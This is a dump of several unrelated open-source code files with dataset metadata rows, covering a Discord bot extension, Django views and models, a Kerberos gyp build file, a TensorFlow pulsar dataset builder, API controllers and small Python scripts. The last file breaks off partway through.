| 24.666667 | 69 | 0.581081 | 30 | 222 | 4.266667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.31982 | 222 | 8 | 70 | 27.75 | 0.847682 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
791417c95b4f230bcee2041f021a263fd00433b3 | 709 | py | Python | ref_bot/extension.py | tser0f/ref_bot | 8945992ec8802a88546494b503d7658cc53d80c5 | [
"MIT"
] | null | null | null | ref_bot/extension.py | tser0f/ref_bot | 8945992ec8802a88546494b503d7658cc53d80c5 | [
"MIT"
] | 1 | 2020-07-02T13:37:44.000Z | 2020-07-07T03:09:50.000Z | ref_bot/extension.py | tser0f/ref_bot | 8945992ec8802a88546494b503d7658cc53d80c5 | [
"MIT"
] | null | null | null | import ref_bot.cog.articlerefs
import importlib
import conf
from discord.ext import commands
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
def setup_dbsession():
engine = create_engine(conf.ini_config.get('sqlalchemy', 'connection_string'))
sessionm = sessionmaker()
sessionm.configure(bind=engine)
return sessionm()
def setup(bot):
print('ref_bot extension loading.')
dbsession = setup_dbsession()
importlib.reload(ref_bot.cog.articlerefs)
bot.remove_command('help')
bot.add_cog(ref_bot.cog.articlerefs.ArticleRefs(bot, dbsession))
def teardown(bot):
print('ref_bot extension unloading.')
bot.remove_cog('ArticleRefs')
| 25.321429 | 86 | 0.750353 | 88 | 709 | 5.886364 | 0.431818 | 0.057915 | 0.052124 | 0.11583 | 0.088803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150917 | 709 | 27 | 87 | 26.259259 | 0.860465 | 0 | 0 | 0 | 0 | 0 | 0.133992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.35 | 0 | 0.55 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
79232ea3a4d5948b82480dc6e30eced57f3b9896 | 737 | py | Python | config/trades.py | ashwinath/stocks-graph | de92ef613f597e4dabba3226a70194000fd2ae70 | [
"Apache-2.0"
] | null | null | null | config/trades.py | ashwinath/stocks-graph | de92ef613f597e4dabba3226a70194000fd2ae70 | [
"Apache-2.0"
] | null | null | null | config/trades.py | ashwinath/stocks-graph | de92ef613f597e4dabba3226a70194000fd2ae70 | [
"Apache-2.0"
] | null | null | null | import os
import yaml
from google.protobuf import json_format
from generated.proto.trades_pb2 import TradeHistory
from generated.proto.config_pb2 import Config
from typing import List
def get_all_trade_configs(config: Config) -> List[TradeHistory]:
all_trade_histories = []
for dir_path, _dir_names, file_names in os.walk(config.trades.folder):
for file_name in file_names:
file_path = os.path.join(dir_path, file_name)
with open(file_path, "r") as file:
trade_history = json_format.ParseDict(
yaml.safe_load(file),
TradeHistory(),
)
all_trade_histories.append(trade_history)
return all_trade_histories
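The walk-and-parse pattern in `get_all_trade_configs` can be exercised without the protobuf and YAML dependencies. The sketch below keeps the same traversal but parses stdlib JSON instead, so it stays self-contained; the file names and payloads are invented for illustration.

```python
import json
import os
import tempfile

def load_all_json(folder):
    # Same traversal as get_all_trade_configs: walk every subdirectory
    # and parse each file found into a Python object.
    results = []
    for dir_path, _dir_names, file_names in os.walk(folder):
        for file_name in file_names:
            with open(os.path.join(dir_path, file_name), "r") as fh:
                results.append(json.load(fh))
    return results

with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, "2020"))
    with open(os.path.join(root, "2020", "a.json"), "w") as fh:
        json.dump({"symbol": "VTI"}, fh)
    with open(os.path.join(root, "b.json"), "w") as fh:
        json.dump({"symbol": "VXUS"}, fh)
    trades = load_all_json(root)
    print(len(trades))  # 2
```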
| 33.5 | 73 | 0.671642 | 95 | 737 | 4.947368 | 0.442105 | 0.068085 | 0.108511 | 0.123404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003663 | 0.259159 | 737 | 21 | 74 | 35.095238 | 0.857143 | 0 | 0 | 0 | 1 | 0 | 0.001357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f702ab8c70e4e0252724db9b6bec22b2fcca74e7 | 203 | py | Python | Ar_Script/past/eg_用户注册.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | Ar_Script/past/eg_用户注册.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | 1 | 2020-01-19T01:19:57.000Z | 2020-01-19T01:19:57.000Z | Ar_Script/past/eg_用户注册.py | archerckk/PyTest | 610dd89df8d70c096f4670ca11ed2f0ca3196ca5 | [
"MIT"
] | null | null | null | import easygui as g
user_info=g.multenterbox(title='账号中心',msg='【*用户名】为必填项\t【*真实姓名】为必填项\t【*手机号码】为必填项\t【*E-mail】为必填项',
fields=['*用户名','*真实姓名','固定电话','*手机号码','QQ','*E-mail']
) | 40.6 | 96 | 0.55665 | 31 | 203 | 3.612903 | 0.645161 | 0.133929 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.182266 | 203 | 5 | 97 | 40.6 | 0.674699 | 0 | 0 | 0 | 0 | 0.25 | 0.401961 | 0.25 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f70509cbebb9afd7e84c6f7a0db27094fc3c5d62 | 1,155 | py | Python | bis/apps/gepiandashboard/views/reports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | 2 | 2021-03-03T16:16:42.000Z | 2021-03-08T22:43:10.000Z | bis/apps/gepiandashboard/views/reports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | bis/apps/gepiandashboard/views/reports.py | AgustinMachiavello/business-incubation-system | 983e1308697771570891568f99d1b8ba74441d32 | [
"MIT"
] | null | null | null | """Reports views"""
# Django
from django.views.generic import TemplateView
# Shortcuts
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
# Rest framework
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
# Menus
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
template_name = 'gepiandashboard/pages/reports_index.html'
def get(self, request):
if not request.user.is_authenticated:
return render(request, 'errors/401.html')
# Build the context per request; a class-level dict would be shared
# across all requests to this view and could leak state between users.
context = {
'menus': getReportsIndexMenus(),
'analytics': getReportIndexAnalytics(),
}
return render(request, self.template_name, context)
| 29.615385 | 97 | 0.772294 | 117 | 1,155 | 7.529915 | 0.512821 | 0.056754 | 0.077185 | 0.056754 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006129 | 0.152381 | 1,155 | 38 | 98 | 30.394737 | 0.893769 | 0.045022 | 0 | 0 | 0 | 0 | 0.063071 | 0.036563 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.37037 | 0 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f715dbd84fff6809be6f2c5c95ceb8898c2ac604 | 2,563 | gyp | Python | binding.gyp | sumeetkakkar/node-krb5 | 3c13021b3fcd3be239d3c731455154910f4d03b6 | [
"BSD-3-Clause"
] | null | null | null | binding.gyp | sumeetkakkar/node-krb5 | 3c13021b3fcd3be239d3c731455154910f4d03b6 | [
"BSD-3-Clause"
] | null | null | null | binding.gyp | sumeetkakkar/node-krb5 | 3c13021b3fcd3be239d3c731455154910f4d03b6 | [
"BSD-3-Clause"
] | 1 | 2019-08-29T18:45:47.000Z | 2019-08-29T18:45:47.000Z | {
"targets": [{
"target_name": "krb5",
"sources": [
"./src/module.cc",
"./src/krb5_bind.cc",
"./src/gss_bind.cc",
"./src/base64.cc"
],
'cflags!': ['-fno-exceptions'],
'cflags_cc!': ['-fno-exceptions'],
'include_dirs': ["<!@(node -p \"require('node-addon-api').include\")"],
'dependencies': ["<!(node -p \"require('node-addon-api').gyp\")"],
'defines': [
'NAPI_DISABLE_CPP_EXCEPTIONS'
],
"conditions": [
[
"OS=='win'",
{
"variables": {
"KRB_PATH": "/Program Files/MIT/Kerberos"
},
"include_dirs": ["<(KRB_PATH)/include", "<(KRB_PATH)/include/gssapi", "src"],
"conditions": [
[
"target_arch=='x64'",
{
"msvs_settings": {
"VCCLCompilerTool": {
"AdditionalOptions": ["/MP /EHsc"]
},
"VCLinkerTool": {
"AdditionalLibraryDirectories": ["<(KRB_PATH)/lib/amd64/"]
}
},
"libraries": ["-lkrb5_64.lib", "-lgssapi64.lib"]
}
],
[
"target_arch=='ia32'",
{
"msvs_settings": {
"VCCLCompilerTool": {
"AdditionalOptions": ["/MP /EHsc"]
},
"VCLinkerTool": {
"AdditionalLibraryDirectories": ["<(KRB_PATH)/lib/amd64/"]
}
},
"libraries": ["-lkrb5_32.lib", "-lgssapi32.lib"]
}
]
]
}
],
[
"OS!='win'",
{
"libraries": ["-lkrb5", "-lgssapi_krb5"]
}
]
]
}]
}
| 36.614286 | 98 | 0.285603 | 124 | 2,563 | 5.725806 | 0.467742 | 0.049296 | 0.025352 | 0.070423 | 0.51831 | 0.51831 | 0.450704 | 0.338028 | 0.338028 | 0.338028 | 0 | 0.021978 | 0.573937 | 2,563 | 69 | 99 | 37.144928 | 0.628205 | 0 | 0 | 0.298507 | 0 | 0 | 0.317597 | 0.059696 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f718e4b6fe5e6cbcd80d9790d53329bb92e5e0b4 | 532 | py | Python | app/core/models.py | DevelopwithTom/simple_inventory_api | 5ce67be1c6ddbe7f5283256d52cf38779cbfdd89 | [
"MIT"
] | null | null | null | app/core/models.py | DevelopwithTom/simple_inventory_api | 5ce67be1c6ddbe7f5283256d52cf38779cbfdd89 | [
"MIT"
] | null | null | null | app/core/models.py | DevelopwithTom/simple_inventory_api | 5ce67be1c6ddbe7f5283256d52cf38779cbfdd89 | [
"MIT"
] | null | null | null | from django.db import models
import uuid
class Product(models.Model):
""" Creates and saves a new product """
sku = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False, unique=True)
name = models.CharField(max_length=255, blank=False, null=False)
quantity = models.IntegerField(blank=False, null=False)
price = models.DecimalField(max_digits=8, decimal_places=2)
def __str__(self):
return "Name: %s, Quantity Available: '%s', Price: £%s" % (self.name, self.quantity, self.price)
| 38 | 104 | 0.710526 | 74 | 532 | 5.013514 | 0.635135 | 0.053908 | 0.075472 | 0.102426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013393 | 0.157895 | 532 | 13 | 105 | 40.923077 | 0.8125 | 0.058271 | 0 | 0 | 0 | 0 | 0.093306 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0.111111 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
f725b5d9ea2e0f39b32bd5e6e8f910abfce3039b | 7,348 | py | Python | tensorflow_datasets/structured/htru2.py | jedlimlx/datasets | dffdc800d3d1f5c39f311f35de3530487153d335 | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/structured/htru2.py | jedlimlx/datasets | dffdc800d3d1f5c39f311f35de3530487153d335 | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/structured/htru2.py | jedlimlx/datasets | dffdc800d3d1f5c39f311f35de3530487153d335 | [
"Apache-2.0"
] | null | null | null | """Dataset for Predicting a Pulsar Star"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow_datasets.public_api as tfds
import tensorflow as tf
import os
_CITATION = """\
@article{10.1093/mnras/stw656,
author = {Lyon, R. J. and Stappers, B. W. and Cooper, S. and Brooke, J. M. and Knowles, J. D.},
title = "{Fifty years of pulsar candidate selection: from simple filters to a new principled real-time classification approach}",
journal = {Monthly Notices of the Royal Astronomical Society},
volume = {459},
number = {1},
pages = {1104-1123},
year = {2016},
month = {04},
abstract = "{Improving survey specifications are causing an exponential rise in pulsar candidate numbers and data volumes. We study the candidate filters used to mitigate these problems during the past 50 years. We find that some existing methods such as applying constraints on the total number of candidates collected per observation, may have detrimental effects on the success of pulsar searches. Those methods immune to such effects are found to be ill-equipped to deal with the problems associated with increasing data volumes and candidate numbers, motivating the development of new approaches. We therefore present a new method designed for online operation. It selects promising candidates using a purpose-built tree-based machine learning classifier, the Gaussian Hellinger Very Fast Decision Tree, and a new set of features for describing candidates. The features have been chosen so as to (i) maximize the separation between candidates arising from noise and those of probable astrophysical origin, and (ii) be as survey-independent as possible. Using these features our new approach can process millions of candidates in seconds (∼1 million every 15 s), with high levels of pulsar recall (90 per cent+). This technique is therefore applicable to the large volumes of data expected to be produced by the Square Kilometre Array. Use of this approach has assisted in the discovery of 20 new pulsars in data obtained during the Low-Frequency Array Tied-Array All-Sky Survey.}",
issn = {0035-8711},
doi = {10.1093/mnras/stw656},
url = {https://doi.org/10.1093/mnras/stw656},
eprint = {http://oup.prod.sis.lan/mnras/article-pdf/459/1/1104/8115310/stw656.pdf},
}
"""
_DESCRIPTION = """\
HTRU2 is a data set which describes a sample of pulsar candidates collected during the High Time Resolution Universe Survey (South).
Pulsars are a rare type of Neutron star that produce radio emission detectable here on Earth.
They are of considerable scientific interest as probes of space-time, the inter-stellar medium, and states of matter.
As pulsars rotate, their emission beam sweeps across the sky, and when this crosses our line of sight, produces a detectable pattern of broadband radio emission.
As pulsars rotate rapidly, this pattern repeats periodically.
Thus, pulsar search involves looking for periodic radio signals with large radio telescopes.
Each pulsar produces a slightly different emission pattern, which varies slightly with each rotation.
Thus a potential signal detection known as a 'candidate', is averaged over many rotations of the pulsar, as determined by the length of an observation.
In the absence of additional info, each candidate could potentially describe a real pulsar.
However, in practice almost all detections are caused by radio frequency interference (RFI) and noise, making legitimate signals hard to find.
Machine learning tools are now being used to automatically label pulsar candidates to facilitate rapid analysis.
Classification systems in particular are being widely adopted, which treat the candidate data sets as binary classification problems.
Here the legitimate pulsar examples are a minority positive class, and spurious examples the majority negative class.
At present multi-class labels are unavailable, given the costs associated with data annotation.
The data set shared here contains 16,259 spurious examples caused by RFI/noise, and 1,639 real pulsar examples.
These examples have all been checked by human annotators.
"""
_URL = "http://archive.ics.uci.edu/ml/machine-learning-databases/00372/HTRU2.zip"
class Htru2(tfds.core.GeneratorBasedBuilder):
"""Dataset for Predicting a Pulsar Star"""
VERSION = tfds.core.Version('2.0.0',
experiments={tfds.core.Experiment.S3: False})
def _info(self):
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION,
features=tfds.features.FeaturesDict({
"Features" : tfds.features.FeaturesDict({
"Mean of the integrated profile" : tf.float64,
"Standard deviation of the integrated profile" : tf.float64,
"Excess kurtosis of the integrated profile" : tf.float64,
"Skewness of the integrated profile" : tf.float64,
"Mean of the DM-SNR curve" : tf.float64,
"Standard deviation of the DM-SNR curve" : tf.float64,
"Excess kurtosis of the DM-SNR curve" : tf.float64,
"Skewness of the DM-SNR curve" : tf.float64,
}),
"Class" : tfds.features.ClassLabel(num_classes=2)
}),
supervised_keys=None,
homepage="https://archive.ics.uci.edu/ml/datasets/HTRU2",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
path = dl_manager.download_and_extract(_URL)
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
num_shards=1,
gen_kwargs={
'file_path': path,
}),
]
def _generate_examples(self, file_path):
"""Yields examples."""
with tf.io.gfile.GFile(os.path.join(file_path, "HTRU_2.csv"), "r") as csvfile:
features = [
"Mean of the integrated profile",
"Standard deviation of the integrated profile",
"Excess kurtosis of the integrated profile",
"Skewness of the integrated profile",
"Mean of the DM-SNR curve",
"Standard deviation of the DM-SNR curve",
"Excess kurtosis of the DM-SNR curve",
"Skewness of the DM-SNR curve",
"Class" # 0 for noise, 1 for pulsar
]
lines = csvfile.readlines()
for i in lines:
feature_lst = i.split(",")
length_increase = 0
for j in range(len(feature_lst)):
if j % (len(features) - 1) == 0 and j != 0:
temp = feature_lst[j + length_increase][0:]
feature_lst[j + length_increase] = feature_lst[j + length_increase][0]
feature_lst.insert(j + length_increase + 1, temp)
length_increase += 1
feature_dict = {}
for j in range(len(feature_lst)):
if j % len(features) == 0:
feature_dict = {}
feature_dict[features[j % len(features)]] = float(feature_lst[j])
elif j % len(features) < len(features) - 1:
feature_dict[features[j % len(features)]] = float(feature_lst[j])
elif j % len(features) == len(features) - 1:
yield j // len(features), {"Features" : feature_dict,
"Class" : int(feature_lst[j])}
| 56.523077 | 1,490 | 0.69951 | 1,006 | 7,348 | 5.050696 | 0.417495 | 0.017713 | 0.023617 | 0.034639 | 0.187168 | 0.163747 | 0.09565 | 0.05865 | 0.044479 | 0.044479 | 0 | 0.023439 | 0.221965 | 7,348 | 129 | 1,491 | 56.96124 | 0.865139 | 0.019325 | 0 | 0.100917 | 0 | 0.100917 | 0.645094 | 0.007376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027523 | false | 0 | 0.055046 | 0.009174 | 0.119266 | 0.018349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f726c946b28663f6039c3f5e99cf5aef3b6ee900 | 302 | py | Python | pyexcel/sheets/__init__.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1 | 2022-01-25T22:52:58.000Z | 2022-01-25T22:52:58.000Z | pyexcel/sheets/__init__.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | pyexcel/sheets/__init__.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | """
pyexcel.sheets
~~~~~~~~~~~~~~~~~~~
Core functionality of pyexcel, data model
:copyright: (c) 2014-2017 by Onni Software Ltd.
:license: New BSD License, see LICENSE for more details
"""
# flake8: noqa
from .sheet import Sheet
from .matrix import Matrix, transpose, Row, Column
| 23.230769 | 59 | 0.652318 | 38 | 302 | 5.184211 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0375 | 0.205298 | 302 | 12 | 60 | 25.166667 | 0.783333 | 0.649007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f7454057bbaa92fce7a7185a8a632a7cde34faf5 | 2,621 | py | Python | server/swagger_server/controllers/people_controller.py | fabric-testbed/core-api | b6f9df2b3cc4e9ab8782b9ef4de035f5f0644e46 | [
"MIT"
] | null | null | null | server/swagger_server/controllers/people_controller.py | fabric-testbed/core-api | b6f9df2b3cc4e9ab8782b9ef4de035f5f0644e46 | [
"MIT"
] | null | null | null | server/swagger_server/controllers/people_controller.py | fabric-testbed/core-api | b6f9df2b3cc4e9ab8782b9ef4de035f5f0644e46 | [
"MIT"
] | null | null | null | import connexion
import six
from swagger_server.models.inline_response200 import InlineResponse200 # noqa: E501
from swagger_server.models.inline_response2001 import InlineResponse2001 # noqa: E501
from swagger_server.models.inline_response2002 import InlineResponse2002 # noqa: E501
from swagger_server.models.model400_bad_request import Model400BadRequest # noqa: E501
from swagger_server.models.model401_unauthorized import Model401Unauthorized # noqa: E501
from swagger_server.models.model403_forbidden import Model403Forbidden # noqa: E501
from swagger_server.models.model404_not_found import Model404NotFound # noqa: E501
from swagger_server.models.model500_internal_server_error import Model500InternalServerError # noqa: E501
from swagger_server.models.payload_people_self_patch import PayloadPeopleSelfPatch # noqa: E501
from swagger_server import util
from swagger_server.response_code import people_controller as rc
def people_get(search=None, offset=None, limit=None): # noqa: E501
"""Search for FABRIC People
Search for FABRIC People by name or email # noqa: E501
:param search: search term applied
:type search: str
:param offset: number of items to skip before starting to collect the result set
:type offset: int
:param limit: maximum number of results to return per page (1 or more)
:type limit: int
:rtype: InlineResponse200
"""
return rc.people_get(search, offset, limit)
def people_uuid_get(uuid): # noqa: E501
"""Person details by UUID
Person details by UUID # noqa: E501
:param uuid: universally unique identifier
:type uuid: str
:rtype: InlineResponse2001
"""
return rc.people_uuid_get(uuid)
def people_uuid_self_get(uuid): # noqa: E501
"""Person details by UUID as self
Person details by UUID as self # noqa: E501
:param uuid: universally unique identifier
:type uuid: str
:rtype: InlineResponse2002
"""
return rc.people_uuid_self_get(uuid)
def people_uuid_update_patch(operation, uuid, body=None): # noqa: E501
"""Update Person details by UUID as self
Update Person details by UUID as self # noqa: E501
:param operation: operation to be performed
:type operation: str
:param uuid: universally unique identifier
:type uuid: str
:param body: Update People details by UUID as self
:type body: dict | bytes
:rtype: InlineResponse2002
"""
if connexion.request.is_json:
body = PayloadPeopleSelfPatch.from_dict(connexion.request.get_json()) # noqa: E501
return rc.people_uuid_update_patch(operation, uuid, body)
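The `offset`/`limit` contract documented in `people_get` (skip a number of items, then return at most one page) maps onto plain slice semantics. The helper below is a hypothetical sketch of that contract, not the actual `response_code.people_controller` implementation:

```python
from typing import List, Optional, Sequence

def paginate(items: Sequence, offset: Optional[int] = None,
             limit: Optional[int] = None) -> List:
    # offset: number of items to skip before collecting the result set;
    # limit: maximum number of results per page (1 or more), None = no cap.
    start = offset or 0
    if limit is None:
        return list(items[start:])
    return list(items[start:start + limit])

print(paginate(list(range(10)), offset=2, limit=3))  # [2, 3, 4]
```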
| 34.038961 | 106 | 0.7562 | 345 | 2,621 | 5.602899 | 0.284058 | 0.074496 | 0.096741 | 0.107087 | 0.41283 | 0.350233 | 0.250905 | 0.154165 | 0.094672 | 0.06208 | 0 | 0.056718 | 0.179321 | 2,621 | 76 | 107 | 34.486842 | 0.841934 | 0.432659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.565217 | 0 | 0.913043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f75a46be7b4ccea161a566cc25fd4d66b17cadaa | 78 | py | Python | 1/for.py | gdaPythonProjects/training2019-thursday | cd4d406a83f3ec914e136cec21d96988eb2ee2e9 | [
"MIT"
] | 5 | 2019-11-07T17:04:17.000Z | 2019-11-20T18:47:28.000Z | 1/for.py | gdaPythonProjects/training2019-thursday | cd4d406a83f3ec914e136cec21d96988eb2ee2e9 | [
"MIT"
] | null | null | null | 1/for.py | gdaPythonProjects/training2019-thursday | cd4d406a83f3ec914e136cec21d96988eb2ee2e9 | [
"MIT"
] | null | null | null | s = 0
for i in range(1, 101):
s += i
print("The sum of the numbers from 1 to 100 is:", s)
| 15.6 | 39 | 0.551282 | 18 | 78 | 2.388889 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145455 | 0.294872 | 78 | 4 | 40 | 19.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0.346154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f76c97eef354283aecc2300158846f981c491d31 | 285 | py | Python | tms_ss/tms_ss_nfbed/scripts/config.py | robotpilot/ros_tms | 3d6b6579e89aa9cb216cd3cb6157fabc553c18f1 | [
"BSD-3-Clause"
] | 54 | 2015-01-06T06:58:28.000Z | 2021-05-02T07:49:37.000Z | tms_ss/tms_ss_nfbed/scripts/config.py | robotpilot/ros_tms | 3d6b6579e89aa9cb216cd3cb6157fabc553c18f1 | [
"BSD-3-Clause"
] | 114 | 2015-01-07T06:42:21.000Z | 2022-02-12T05:54:04.000Z | tms_ss/tms_ss_nfbed/scripts/config.py | robotpilot/ros_tms | 3d6b6579e89aa9cb216cd3cb6157fabc553c18f1 | [
"BSD-3-Clause"
] | 24 | 2015-03-27T08:35:59.000Z | 2020-06-08T13:05:31.000Z | #!/usr/bin/env python
# coding: utf-8
#
# Author: Kazuto Nakashima
# URL: https://github.com/kazuto1011
# Created: 2016-06-07
config = {
'server_IP': '192.168.4.170',
'PORT': 49952,
'xml_file': 'C:/Users/nemuriscan/Desktop/NemuriScanLog/NemuriScanStateInfo.xml'
}
| 21.923077 | 83 | 0.659649 | 37 | 285 | 5.027027 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 0.164912 | 285 | 12 | 84 | 23.75 | 0.663866 | 0.42807 | 0 | 0 | 0 | 0 | 0.630573 | 0.414013 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f76f088ecf77e4f5aae9939484cc2d3998ac2b80 | 265 | py | Python | server/src/weaverbird/pipeline/steps/utils/validation.py | JeremyJacquemont/weaverbird | e04ab6f9c8381986ab71078e5199ece7a875e743 | [
"BSD-3-Clause"
] | 54 | 2019-11-20T15:07:39.000Z | 2022-03-24T22:13:51.000Z | server/src/weaverbird/pipeline/steps/utils/validation.py | JeremyJacquemont/weaverbird | e04ab6f9c8381986ab71078e5199ece7a875e743 | [
"BSD-3-Clause"
] | 786 | 2019-10-20T11:48:37.000Z | 2022-03-23T08:58:18.000Z | server/src/weaverbird/pipeline/steps/utils/validation.py | JeremyJacquemont/weaverbird | e04ab6f9c8381986ab71078e5199ece7a875e743 | [
"BSD-3-Clause"
] | 10 | 2019-11-21T10:16:16.000Z | 2022-03-21T10:34:06.000Z | from typing import Sequence
from weaverbird.exceptions import DuplicateColumnError
